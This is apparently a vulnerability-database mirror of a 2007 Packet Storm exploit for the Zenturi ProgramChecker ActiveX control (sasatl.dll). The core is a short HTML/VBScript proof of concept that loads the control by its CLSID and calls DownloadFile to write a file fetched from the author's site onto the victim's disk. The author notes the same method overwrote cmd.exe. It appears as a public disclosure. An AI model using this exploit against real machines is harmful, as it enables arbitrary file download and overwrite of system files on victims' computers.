Lucene search

K

zenturi-overwrite.txt

🗓️ 31 May 2007 00:00:00Reported by shinnaiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Zenturi ProgramChecker ActiveX Arbitrary File Overwrite Exploi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`pre>  
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/30</b></p></span>  
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------  
<b>Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit</b>  
url: http://www.programchecker.com/activeintro.aspx  
  
author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://shinnai.altervista.org  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7  
all software that use this ocx are vulnerable to this exploits.  
  
Using the "DownloadFile" method, you can download everything you want on a pc. This  
exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.  
-------------------------------------------------------------------------------------------  
  
<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test' ></object>  
  
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">  
  
<script language='vbscript'>  
Sub tryMe()  
  
test.DownloadFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\shinnai.txt" ,"0", "0"  
  
End Sub  
</script>  
</span></span>  
</code></pre>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
18
.json
Report